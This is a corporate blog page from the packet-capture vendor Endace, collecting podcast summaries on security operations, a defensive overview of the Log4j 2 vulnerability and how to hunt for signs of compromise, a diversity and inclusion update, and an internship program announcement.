Endace Packet Forensics Files: Episode #32

Original Entry by : Michael Morris

Michael talks to Merritt Baer, Principal in the Office of the CISO at AWS

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Is your organization trying to implement enterprise level security at scale and you’re not sure where to focus?

In this episode of the Endace Packet Forensic files I talk with Merritt Baer, Principal in the Office of the CISO at AWS, who shares her experience in how to design and build robust, dynamic security at scale. Merritt discusses what security at scale looks like, some of the things that are often missed, and how to protect rapidly evolving hybrid cloud infrastructures.  She highlights some common pitfalls that organizations run into as they shift workloads to cloud providers and how to pivot your SOC teams and tools to ensure you have robust security forensics in place.

Finally, Merritt examines how adopting SOAR platforms can help, and things you can do to prevent gaps and breakdowns in your security posture.

Other episodes in the Secure Networks video/audio podcast series are available here.


Log4j 2: A Week Look Back

Original Entry by : Michael Morris

Do you know if you have been attacked?

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Log4J 2 - how can you see if you've been attacked?Many organizations have been scrambling this week to search their networks for instances of any use of Log4j 2 libraries and quickly patch applications, systems, appliances, or devices that might be using them. Lots of cycles are being spent reaching out to equipment and software vendors trying to determine if their systems or applications are potentially impacted and applying fixes and updates to stop potential compromises. The primary response for most security teams has been to apply patches and plug the holes.

But what exactly is the threat?  Apache Log4j 2 Java library is vulnerable to a remote code execution vulnerability (CVE-2021-44228) known as Log4Shell. This gives remote unauthenticated attackers the ability to execute arbitrary code loaded from a malicious server with the privileges of the Log4j 2 process.

It is nicely illustrated in this diagram from the Swiss Government Computer Emergency Response Team:

 

Log4J2 - JNDI attack process
(from: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/)

Any system with this vulnerability is now an entry point for the seeding or running of remote code execution that could then conduct any number of other nefarious activities.

I have been reading numerous articles and attending various seminars from threat intel teams such as Palo Alto Network Unit 42, that discuss the risk, scale, and severity of the potential risks to organizations from this zero-day threat. There are several key takeaways I have learned.

First, because of the prevalence of this vulnerability, literally millions of systems are at risk. Second, because of the scale of attacks leveraging this vulnerability there have already been several compromises and ransomware attacks. However, a lot of the current threat actor activity to this point appears to be reconnaissance and planting of additional malware that can be used later after threat actors have obtained initial access to a network and systems on it.

Our technology partner, KeySight Technology, has been tracking honeypot activity which shows huge numbers of exploitation attempts – demonstrating how many threat actors are scanning the internet looking for vulnerable systems.

Industry-wide there are already a huge number of bots scanning the internet simply looking for openings. Key advice from threat intel teams is to immediately isolate any impacted servers as they are truly open backdoors to the rest of your infrastructure. There are numerous tools out there to scan your environment for Log4j 2 use.

Anywhere that Log4j 2 is found you need to isolate and investigate for any potential compromises. It’s essential to put in place policies, rules, and filter protections to monitor outbound egress of traffic to unknown IP addresses. Apply filters and pay extra attention to common traffic protocols like LDAP, LDAPS, RMI, DNS as these are key protocols being leveraged for lateral movement and reconnaissance. Look for anomalous or unexpected traffic to and from potentially compromised systems if you are unable to isolate them.

Of course, you should also ensure your IDS’s or firewalls have updated rule sets for Log4j 2 so that you can block or detect any future attempts to infect your network. This needs to be done quickly so you can get on with the job of reviewing any damage that may have been done.

If you’re collecting network metadata on a SIEM such as Splunk or Elastic, the first place to start looking would be to search all http transactions for strings including JNDI calls. Our partner, Splunk, published a blog on how to do this here:

https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html

Once you have identified any JNDI calls, it’s critical to review the recorded network packet data to determine if any outgoing connections were made from potentially compromised servers.

EndaceProbes can capture weeks or months of packet data, allowing you to quickly review potential threats that may have occurred prior to the public announcement of the Log4j 2 vulnerability. Chris Greer published a very useful YouTube video of how to use Wireshark to identify and analyze a Log4j2 attack. Well worth watching:

Once you have identified connections that contain the JNDI string you can quickly examine any the subsequent outgoing connections from the affected host to see if successful contact was made with the malicious LDAP server, downloading java malware to infect your server. Knowing whether this step did or did not happen will save your team many days of incident response and allow them to focus on the servers that have been compromised.

Good luck with the Log4j 2 threat hunting! To learn more about how cost effective and simple it can be to have an always-on network packet capture platform integrated with the rest of your security tools to help you search for Log4J 2 and other zero-day attacks go to www.endace.com.


Endace Packet Forensics Files: Episode #31

Original Entry by : Michael Morris

Michael talks to Kamal Khlefat, Product Manager, LinkShadow

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Modernizing the SOC is one of the latest trends cyber security teams are undertaking to stay current and on a level playing field against today’s threat actors. Whether it is adapting to simply keep up with the volume of threats or implementing AI and ML technologies to find and prevent more sophisticated threat vectors SecOps need to improve and upgrade.

In this episode of the Endace Packet Forensic files, I talk with seasoned SOC Director, Kamal Khlefat, now Product Manager at LinkShadow, who shares his perspectives on the movement to modernize the SOC.

Kamal gives his insight into where most SOC teams are struggling and the gaps organizations have in their cybersecurity defenses. He shares some observations about what customers are doing to handle ever-increasing alert volumes and the fatigue analysts suffer in their relentless effort to investigate and troubleshoot every indicator of compromise. And, finally, Kamal highlights some of the differences he is seeing between various industry verticals like governments, financial, energy and retail.

Other episodes in the Secure Networks video/audio podcast series are available here.


Diversity and Inclusion at Endace

Original Entry by : Katrina Schollum

By Katrina Schollum, People Partner, Endace


Since we established our Diversity and Inclusion Committee earlier this year, we have been busy working to cement the importance of our Diversity and Inclusion program at Endace.

As a group, we have held regular discussions across our four focus areas; gender, ethnicity, generations and people with different abilities, to establish how we can achieve positive outcomes for people and the business, increase awareness and break down barriers. We are committed to community-led objectives that support and celebrate individuality and foster a sense of belonging for everyone. In this blog post we are pleased to share some of our progress.

Establishing Who We Are

It was important to us to understand who we are at Endace, and what is important to us as we shape our path forward.

We created anonymous reporting on gender, nationality and cultural ethnicity and were able to share the statistical data visually with the whole organisation, which we will continue to do as we track our changes over time. We can report we have at least 24 different nationalities within Endace and we are extremely proud of our very culturally diverse workplace.
One of our biggest pieces of work was an internal survey that sought specific input across our four key areas. The Committee invested a lot of effort into asking the right questions so we could understand where there was lack of clarity, what areas we are doing well and what areas need improvement to focus on. As a result, we were able to clarify our key messages and share these across the organization via various channels including workshops, promotional activity such as email newsletters and posters, and team meetings.

Diwali Decoration Competition - Endace
Winning Diwali entry

We were also able to meet a popular requests to celebrate key cultural celebrations throughout the year – such as sharing Māori themed food at our New Zealand offices to celebrate Matariki (which marks the beginning of the new year in the Māori lunar calendar). In addition, we celebrated Diwali with a global team competition to learn more about this festival of lights. We plan to promote and celebrate many more of these occasions on an ongoing basis – giving everyone at Endace an opportunity to learn more about other cultures represented in the team.

These activities are all great examples of the success of our community-led approach. By seeking input from the entire team we better understand what’s important and where we can add value to our diversity and inclusion initiatives. Sometimes it is relatively simple things that can make a big difference.

Community Led Initiatives
Marjo Montejo - Endace - reflects on Women in Technology Day
Marjo Montejo reflects on women in technology on International Women’s Day

Our Committee has put together a plan of strategic, measurable objectives from our group discussions. Some of the activities that have already been delivered including calendar events such as World Autism Awareness Day. We also highlighted International Women’s Day by sharing photos and personal stories about what the day meant to our team, and about what it means to be a woman in the tech industry.

We also recently held Cultural Intelligence workshops that were attended by 79.5% of our organisation. The workshops gave us tools to improve on the understanding of cultures other than our own and break down barriers to support greater participation, integration and increase the sense of belonging.

Recently, for Transgender Awareness Week, a member of our transgender community at Endace shared his story in a powerful interview with Sasha Blair, VP People & Legal, to answer some questions about the trans community and his experiences. The recording was shared internally and some fantastic feedback was received. Our ongoing conversations around gender have made a noticeable difference in using gender-neutral and inclusive language.

What’s Next?

Looking ahead, we have planned some thought-provoking activities to celebrate and support individuals. The immediate focus will be educating ourselves on Neurodiversity and understanding how it adds value to our business.

Neurodiversity in the tech sector has at times been overlooked but major tech organisations are making great strides in this area and we are keen to see how we can contribute to these initiatives too.

While change takes time, we will continue to celebrate what makes Endace unique and keep taking steps to ensure our team can strengthen their feeling of belonging, and feel their individual voices are heard, valued and respected. We anticipate the more initiatives we implement in our organisation, the more positive outcomes we will observe. Our agenda will support our achieving an increasingly inclusive environment and we look forward to sharing our progress.


Our 2021/22 Internship Program Begins

Original Entry by : Katrina Schollum

We are very pleased to have recently welcomed six Interns to join us for their 13 week, R.E.A.L (remarkable, enjoyable, authentic, learning) Summer Internship program in our R&D Center in Hamilton, New Zealand.  We had a fantastic response to, and level of interest in, our individual projects and we look forward to seeing what this year’s Interns can learn and achieve.

Induction Day

Working remotely meant a different look and feel for Day 1 of our program with introductions happening via Teams.  Our Interns were introduced to life at Endace virtually, including a welcome from our CEO Stuart Wilson.

The afternoon kicked off with a team-building activity which was facilitated by Team Up Events and involved 4 different teams in an online race against the clock.  Moving around the continents, learning, answering questions, taking group photos, and lots of laughs – it was a fun part of the day getting to know our new team members and testing how good our online communication skills have become!

One of our mentors, Norbert, confirmed the ‘Travel Around the World’ activity was “fun for us, but also a good chance to get to know the Interns and break the ice – which is not easy working remotely.”  After the ice was broken our Interns and their individual mentors had the opportunity to continue the conversation and begin their projects together.

Our Program

We are proud of our history, contribution to ongoing learning and continuing our strong bonds to our company origins in tertiary education.  From day one, our Interns learn about Endace’s history and products and develop relationships with their mentors.  This year, we are thrilled to have three mentors and managers who, in previous years, were themselves Endace Interns and offer unique insight from both sides of the relationship.  Sam, one of the new mentors, said “being an Intern at Endace was challenging but in the best possible way. I learned so much in such a short time, and the support and guidance I received along the way allowed me to make a smooth transition from study into the workplace. I am excited to be able to pass on some of what I learned to the next crop of Interns.”

Across 13 weeks the Internship program focuses on commercially relevant, individual projects and providing structured training including lunch-and-learns to introduce other areas of the business such as finance, HR, marketing and operations to create  a well-rounded experience.  The Internship program culminates with our Interns delivering a presentation at a shared learning session involving Interns and their mentors, members of the senior leadership team and project managers.

2021/22 Interns’ first day in the office
2021/22 Interns’ first day in the office

The Endace Internship Program is a great way to help computer science students and graduates build talent and experience and grow the industry. It also helps us showcase Endace as an employer of choice for IT and engineering graduates in New Zealand.

Our Interns become sought-after graduates with meaningful, hands-on experience and we will be following their achievements with interest.  ­­It was fantastic to finally have our Interns join us in the office so we could meet face-to-face, and we look forward to seeing them share their progress at the close of the program.


Endace Packet Forensics Files: Episode #30

Original Entry by : Michael Morris

Michael talks to Tony Krzyzewski, Director of SAM for Compliance and Global Cyber Alliance Ambassador

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

In this episode of the Endace Packet Forensic files, I talk with Tony Krzyzewski, Director of SAM for Compliance, Global Cyber Alliance Ambassador, and New Zealand’s Convenor on the International Standards Organization SC27 Information Security, Cybersecurity and Privacy Protection Standards Committee.

With more than four decades working in IT and Networking, and almost three decades in cybersecurity, there are few more experienced practitioners than Tony. In this episode, Tony draws on his extensive experience to give some practical, pragmatic advice about where organizations need to focus to improve their cyber defenses. He highlights the importance of focusing on operational management processes for any cyber security program and reinforces the mantra I have been hearing from many CISOs about how the importance of regularly practising and performing “Security FireDrills”.

Tony talks about his long-time campaign to encourage organizations to adopt DMARC, “Domain-based Message Authentication, Reporting and Conformance” policies to improve protections against fraudulent email and phishing attacks.

Finally, Tony gives his perspective on the massive surge in SOAR and XDR solutions in the market and how that is impacting organizations’ security postures, and puts on his predictions hat as he talks about what to look out for in the year ahead.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #29

Original Entry by : Michael Morris

Michael talks to Tim Dales, VP Labs and Analyst, IT Brand Pulse

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

What is the “Total Cost of Ownership” for security teams to get absolute forensics with full packet capture?

In this episode of the Endace Packet Forensic files, I talk with Tim Dales, VP of Labs and Analyst for IT Brand Pulse. Tim shares the results of an IT Brand Pulse study that examines the cost of in-house developed packet capture solutions versus off-the-shelf, vendor-built solutions.

Tim shares details of the report’s findings including the pros and cons and some of the key things many people don’t consider before trying to build solutions in-house.

Finally, Tim discusses key changes in how organizations are thinking about their security architectures and the gaps they are looking to address. He shares the importance of integrated workflows in helping analysts to accelerate investigation times and confirm or dispense potential indicators of compromise more definitively.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #28

Original Entry by : Michael Morris

Michael talks to Tim Wade, Director, Office of the CTO, Vectra AI

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Security Operations teams at many organizations are reviewing processes and tools as breaches continue to happen, investigation times remain too long, outcomes are uncertain, and too many alerts are going unaddressed. Organizations are asking, “why are we spending so much money on security without tangible results?” They are looking at “SOC Modernization” initiatives to help them defend effectively against increasingly sophisticated threat actors.

In this episode of the Endace Packet Forensic files I talk with Tim Wade, Technical Director from the Office of the CTO at Vectra.AI, who shares his insights into the “SOC Modernization” trend and three pillars that he suggests require a change in thinking to ultimately be successful.

Tim starts with a fundamental change in philosophy – he suggests SOC teams need to shift from a “prevention” to a “resiliency” approach to cyberdefense. He illustrates the importance of taking incremental and iterative steps with monthly and even weekly measurement and review cycles to evaluate progress.

Tim suggests SOC teams need to better understand the rules of the game so they can step back and actively work to break them – because that is exactly what our treat actor adversaries are doing every day. Challenge everything and think like your opponent.

Finally, Tim advises CISOs that modernization needs to address challenges holistically. Not just focusing on technologies, but also ensuring they are working on people and processes and gaps in training, communication, and thinking.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #27

Original Entry by : Michael Morris

Michael talks to Phillip Solakov, Client Solutions Director at Optiv

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, EndaceCyber security teams around the globe are embarking on a variety of “modernization” initiatives, as they try to keep up with the dynamic threat landscape, but what are the must-have elements if you are looking to modernize your SOC?

You won’t want to miss this episode of the Endace Packet Forensic files as I talk with Phillip Solakov, Client Solutions Director for Optiv Canada, as he shares his view of what “SOC Modernization” means and what’s driving these efforts.

Phillip explains some of the biggest issues SOC teams are facing and things they are working on to overcome these challenges. He drills into how alert fatigue is compounded with more detection tools, more telemetry and why it is becoming critical for more automation in SOC processes and tools.

Finally, Phillip highlights some things SOC teams are still missing with the continuously expanding attack surface, and he gives some examples of how these gaps can still be addressed with the right security architecture and mindset.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #26

Original Entry by : Michael Morris

Michael talks to Pavel Minarik, CTO of Kemp Technologies

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Many organizations are undertaking SOC and NOC modernizations, but what does this mean and what is driving it?

If your company is planning a “modernization” you won’t want to miss this episode of the Endace Packet Forensic files as Pavel Minarik, CTO of Kemp Technologies, talks about what’s important and what is fueling the need to modernize.

Pavel gives his insights into some of the biggest challenges NOCs and SOCs are facing and shares some tips to help these separate teams work together and collaborate more.  He underscores why this is becoming more important with increasing network complexity, virtualization, and escalating threat attack vectors.

Finally, Pavel talks about why network traffic is such a foundational data source for both NoCs and SoCs and the pros and cons of flow-based monitoring vs full packet monitoring. He shares the best practices analysts are adopting to become improve investigation efficiency and reduce incident response times.

Other episodes in the Secure Networks video/audio podcast series are available here.